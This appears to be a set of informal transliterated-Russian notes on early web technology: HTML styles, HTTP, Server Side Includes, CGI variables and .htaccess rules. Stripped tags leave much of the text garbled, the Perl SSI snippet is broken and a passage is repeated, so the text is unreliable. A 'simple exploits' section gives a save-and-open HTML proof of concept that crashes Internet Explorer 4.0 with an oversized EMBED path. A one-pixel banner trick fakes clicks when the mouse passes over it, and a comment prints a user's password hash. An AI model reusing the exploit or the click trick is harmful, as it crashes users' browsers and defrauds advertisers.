index.html Esli prosyat vydat' katalog, to vydayut index
esli ego net, vydaetsya prosto oglavlenie kataloga
HEADER.html Ego soderzhimoe dobavlyaetsya pered nachalom listinga
README.html Ego soderzhimoe dobavlyaetsya k koncu listinga
.htaccess Upravlyayushchij fajl s lokal'nymi nastrojkami tekushchej direktorii
Razobrat'sya stoit s etimi harakteristikami:
Alias - gde to dolzhna lezhat' rasshifrovka. a server budet
ee podstavlyat'.
Vot tol'ko gde ?
Ustanavlivaet obshchij otstup vpravo.
Vynesennyj vpravo fragment teksta
Gorizontal'naya cherta
Okonchanie paragrafa
ZHestkij konec stroki
Tekst mezhdu etimi tagami ne budet perenosit'sya
na novuyu storku kakim by dlinnym on ne byl
Fizicheskie stili
Bold zhirnyj tekst Itallic kursiv tekst Underline podcherknutyj Rabotaet tol'ko v Netscape 3
Typewriter tekst s fontom fiksirovannoj shiriny Strike perecherknutyj tekst
Logicheskie stili
Definition. Opredelyaemoe slovo italic
Emphasis. Udarenie italic
Titles of books. Citata italic
Programm. Programmnyj tekst fixed
User keyboard entry. bold fixed
Status message fixed
Variable. italic Strong emphasis. bold
Vydelyaetsya adres italic
Upravlenie cvetami i fontami
_BODY_ tagi srabatyvayut tol'ko esli raspolozheny v samom nachale dokumenta
A tak ustanavlivayut sobstvennye cveta vo vsem dokumente
A tak delali traurnye kolera, kogda protestovali.
Tekst bOl'shego razmera, i pokrashennyj v krasnyj cvet, s zadannym tipom fonta
Dal'she pojdet tekst s fontom zadannogo razmera
a tak zhe background zvuk
Esli nuzhen tekst sboku
ot kartinki
Otstup teksta ot kartinki
ALT - chto napisat', esli kartinka ne chitaetsya,
LOWRES - pered risovaniem bol'shoj kartinki zagruzit' etu - malen'kuyu
Tak podkladyvayut BACKGROUND
Tablichki -
tr - zadaet stroku Stolbec
Stolbec
Vnutri tablicy mozhet byt' takoj tag, Podzagolovok?
KRUPNYJ TEKST V BLOKE
prozrachnyj otstup: spacer
Tablichka s cvetnym blochnym zagolovkom i ramochkoj
$M{Ti}{$PI}
$RazdelOut
O protokole HTTP/1.*
Klient otkryvaet tcp soedinenie s hostom www.host.com na port
(obychno 80) i govorit tuda
GET /local/url/file/name.html HTTP/1.0
Host: www.host.com
Http_referer: url_dokumenta_na_kotorom_stoyal_klient
Eshche nekotoroe kolichestvo zagolovkov,
kotorye rasskazyvayut serveru, kto s nim imeet delo.
Vse oni, krome GET neobyazatel'ny
. . .
^M^J - pustaya stroka - konec zagolovkov - konec zaprosa
Obratno vyvalivaetsya otvet servera:
http-shnye zagolovki
na neskol'kih strokah
^M^J - pustaya stroka
Sobstvenno zaproshennyj dokument as is
Uprazhnenie: skazhite
$ telnet www 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /index.html HTTP/1.0
I potom dva raza nazhmite na Enter
Kak rabotet dokachka v HTTP/1.1 protokole?
V zapros vstavlyaetsya special'noe pole "Range: bytes nnn-".
Server s dokachkoj vozvrashchaet kod 206 - "CHast' soderzhimogo" i
peredaet zaproshennuyu chast' fajla. Esli server ne podderzhivaet
dokachki, on prosto vozvrashchaet 200 i vysylaet ves' fajl kak pri
obychnom zaprose.
SSI - Server Side Includes
Polnaya specifikaciya lezhit, naprimer na www.apache.org
0. CHtoby SSI-fajly vzvodili Last-modified, dobavit' v konfig
XBitHack full
i sdelat' im chmod g+x file.shtml
1. CHtoby SSI vypolnyalis', neobhodimo zadat' v konfiguracionnyh
fajlah servera:
/etc/httpd/conf/access.conf :------------------------
# "Vklyuchit'"
Options +Includes # ili dazhe Options All
/etc/httpd/conf/srm.conf :------------------------
AddType text/html .shtml
AddHandler server-parsed .shtml
2. Togda SSI otrabatyvayutsya tol'ko v fajlah s rasshireniem .shtml
Primery:
charset=
The value will often be enclosed in double quotes; many com
mands only allow a single attribute-value pair.
The allowed ELEMENTS are:
config - parametry parsinga
Atributy config
errmsg - soobshchenie ob oshibke, posylaemoe klientu
sizefmt - format razmera fajla
timefmt - format daty modifikacii fajla
var - napechatat' imya peremennoj
exec - vypolnit' shell ili CGI-skript
cgi - (%-encoded) URL relative path to the CGI script.
cmd - vypolnit' shell
fsize - napechatat' razmer fajla
file - otnositel'noe imya fajla
virtual -(%-encoded) URL-path relative fajla
flastmod - poslednnee vremya modifikacii fajla
include - vstavit' dokument
file - vstavlyaemyj fajl
virtual - URL - tol'ko na etom zhe hoste
Include variables
These are available for the echo command, and to any program
invoked by the document.
DATE_GMT
The current date in Greenwich Mean Time.
DATE_LOCAL
The current date in the local time zone.
DOCUMENT_NAME
The filename (excluding directories) of the document requested
by the user.
DOCUMENT_URI
The (%-decoded) URL path of the document requested by the user.
Note that in the case of nested
include files, this is not then URL for the current document.
LAST_MODIFIED
The last modification date of the document requested by the user.
If server side includes are enabled, you will see data values below:
The date is:
The current version of the server
The CGI gateway version
The server name
This file is called:
This file's URI
The query string
This file was last modified:
The size of the unprocessed file
sample.html was last modified
You are using
You came from
# |mulyaciya SSI v perl-cgi
if (//) {
print $`;$tmp = $';
open (INC,"$inc") || die "Can't Open $inc: $!\n";
while () {
if (//) {
@time = localtime ( time() ); $time[4]++;
if ($time[4] < 10) { $time[4] = "0" . "$time[4]"; }
s//$time[3].$time[4].$time[5]/g;
}
print $_;
}
close(INC);
print "$tmp";
}
Upravlenie dostupom cherez httpd.conf
SetEnvIfNoCase Referer rusf\.ru internal_referer
SetEnvIfNoCase User-Agent Teleport internal_referer
SetEnvIfNoCase User-Agent Vampire internal_referer
SetEnvIfNoCase User-Agent ReGet internal_referer
SetEnvIfNoCase User-Agent GetRight internal_referer
SetEnvIfNoCase User-Agent Wget internal_referer
ErrorDocument 403 http://rusf.ru/books/index.htm
order deny,allow
deny from all
allow from env=internal_referer
# No offline browsers v robots.txt
User-Agent: DISCo Pump, Wget, WebZIP, Teleport Pro, WebSnake, Offline
Explorer, Web-By-Mail
Disallow: /
i vneshnimi, vyzyvaemymi programmami - gateeway'yami.
Sam CGI-script dolzhen lezhat' v /home/httpd/cgi-bin
togda ego nahodyat (ili v drugih katalogah, opisannyh v acces.conf
Dannye peredayutsya v komandnoj stroke, cherez peremennye
okruzheniya, i cherez standartnyj vvod. Vozvrashchayutsya na
standartnyj vyvod, v nachale dolzhna stoyat' "volshebnaya stroka"
Esli dobavit' v konnfiguracionnyj fajl
/etc/httpd/conf/srm.conf :------------------------
AddType application/x-httpd-cgi .cgi
To CGI-skripty mozhno budet klas' v lyuboj podkatalog dereva
dokumentov - s rasshireniem .cgi
Formy i indeksy
Vojti v fajl, i spozicionirovat'sya na stroku s shablonom "cl"
http://hoohoo.ncsa.uiuc.edu/file.html#cl
Request for a CGI script with no extra path information and no query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi
Request for a script with extra path information, and no query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi/extra/path
Request for a script with no extra path information, and an ISINDEX query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi?query
Request for a script with extra path information as well as an ISINDEX query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi/extra/path?a+query
Vyzyvaetsya odna i ta zhe programma, no ej peredaetsya 0,1,1 ili 2 argumenta:
extra path - "dobavochnyj marshrut", idushchij vsled za imenem ekzeshnika
query - dlinnaya stroka posle znaka "?"
na extra path rabotaet image map - im peredaetsya imya opisatelya kartinki
query peredaetsya zapolnennym ISINDEX
CGI-skriptu peredayutsya takie parametry:
Parametry peredayutsya v peremennyh okruzheniya.
REMOTE_ADDR=127.0.0.1
REMOTE_HOST=localhost
HTTP_REFERER=http://www.ac.msk.su:80/cgi-bin/html-KOI?KSP/bachurin.txt
REQUEST_METHOD=GET
QUERY_STRING=query
PATH_INFO=/marshrut
PATH_TRANSLATED=/home/httpd/docs/marshrut
SCRIPT_NAME=/cgi-bin/proba
HTTP_USER_AGENT=NCSA Mosaic for the X Window System/2.4 libwww/2.12 modified
A teper' vot kak oformlyayutsya formy s checkbox'ami:
# ISINDEX - parametr zaprosa peredaetsya prgogramme CGI v $1
# V forme METHOD=GET - tam vyzyvaetsya komanda kotoroj peredaetsya
# argument v peremennoj okruzheniya QUERY_STRING
# http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi?button1=on&button2=off
# A vot kak rabotaet POST, i PUT. Dopolnitel'naya informaciya protalkivaetsya
klientom na server. Server podaet ee cgi-programme na standartnyj vvod.
dlina posylaemogo fajla ustanavlivaetsya v peremennoj okruzheniya CONTENT_LENGTH
a tip dannyh - v CONTENT_TYPE
FORM ACTION="http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi" METHOD="POST"
CHto my posylaem klientu obratno:
Status: 200 OK
Status: 404 File not found
Content-type: text/html
Soderzhimoe, kotoroe kidaetsya skvoz' nashego servera - klientu
Esli ya generyu ne soderzhimoe, a tol'ko ssylku, to:
Location: /path/doc.txt
ili
Location: gopher://gopher.ncsa.uiuc.edu/
Generim tekst v chistom servernom vide - on poedet
klientu srazu, bez dopolnitel'noj fil'tracii:
--- start of output ---
HTTP/1.0 200 OK
Date: Tuesday, 26-Dec-95 15:17:10 GMT
Server: NCSA/1.3
MIME-version: 1.0
Content-type: text/html
Last-modified: Tuesday, 24-Dec-95 15:15:41 GMT
Content-length: 3132
This is a plaintext document generated on the fly just for you.
--- end of output ---
Podstavlyajte tuda sootvetstvuyushchie znacheniya peremennyh
$SERVER_PROTOCOL $SERVER_SOFTWARE
Fenechki
Avtopodstanovka URL s timeout'om. Podstavit' v nachalo dokumenta:
Dal'she idet mestnyj HTML-dokument - kotoryj cherez 12 sekund budet
avtomaticheski zamenen na vysheukazannyj URL
Voobshche - tag META HTTP-EQUIV pozvolyaet vzvesti dopolnitel'nye polya v
HTTP-zagolovok dokumenta. Naprimer "nasil'stvennoe vzvedenie charset'a:
Content-type: text/html
Set-Cookie: cookiename=valueofcookie; expires=Saturday, 28-Feb-96 23:59:59 GMT; path=/cgi-bin/mycgiprogram
|ta shtuchka budet avtomatom otsylat'sya v nash server klientom, kak tol'ko on ee poluchil
Podrobnee sm. http://citforum.ru/win/internet/html/c_what_is.shtml
Esli skazat' tak, to klient ostanetsya na starom meste, i ne
budet perehodit' po ssylke
Status: 204 No Content
A takoj link pozvolyaet srazu zapolnit' nekotorye polya v mailto poslanii
tets
Samoklikaemoe pis'mo
> Byla ideya posylat' v nego soobshchenie kogda myshkoj nad bannerom provodyat.
> (Kogda banner interesen, chasto k nemu kursor podvodyat)
> No chto-to ya ne dop£r kak eto realizovat' bez hidden frame.
V pravilah ustanavlivaesh', chto u tebya _standartnyj kod_
tvoej setki soderzhit:
Kogda klient budet snizu _peresekat'_ mysh'yu tvoyu odnopiksel'nuyu
polosku budet avtoklik, a chtob klienta ne napryagat' -
puskaj tvoj http://koshelev.ru/cgi-bin/bannerOver
vozvrashchaet kod 204 No Content - t.e. _ne perehodit'_ na link a
ostat'sya na staroj stranice.
Ssylka na kotoruyu perehodyat avtomaticheski
Dostatochno navesti na etu ssylku mysh', i brouzer pojdet po
linku - bez klika.
Prostye eksplojty
MSIE 4.0. 4.01 can be crashed with a little help of the < EMBED > tag.
<EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
opens a dialog box and closes IE 4.0. the long file extension causes stack overrun.
--------cut here and save as crashmsie.html---------------------
Trying to crash IE 4.0
<EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
40
80 160 170 180 190 200
</HTML>
---------------------------------------------------------------
Zakrytie katalogov dlya vneshnih klientov
Sozdaem v kataloge fajl .htaccess takogo soderzhaniya
order deny,allow
deny from all
allow from polimos.ras.ru localhost
Order deny,all
Allow from .abc.ru
Deny from all
Satisfy any
AuthType Basic
AuthName lenta.ru
AuthUserFile /home/www/passwd
# moshkow:1HrhNpfYnwTau standartnyj crypt()
require valid-user
Esli nuzhen tekst sboku
ot kartinki
Otstup teksta ot kartinki
Kogda klient budet snizu _peresekat'_ mysh'yu tvoyu odnopiksel'nuyu
polosku budet avtoklik, a chtob klienta ne napryagat' -
puskaj tvoj http://koshelev.ru/cgi-bin/bannerOver
vozvrashchaet kod 204 No Content - t.e. _ne perehodit'_ na link a
ostat'sya na staroj stranice.
Ssylka na kotoruyu perehodyat avtomaticheski
Dostatochno navesti na etu ssylku mysh', i brouzer pojdet po
linku - bez klika.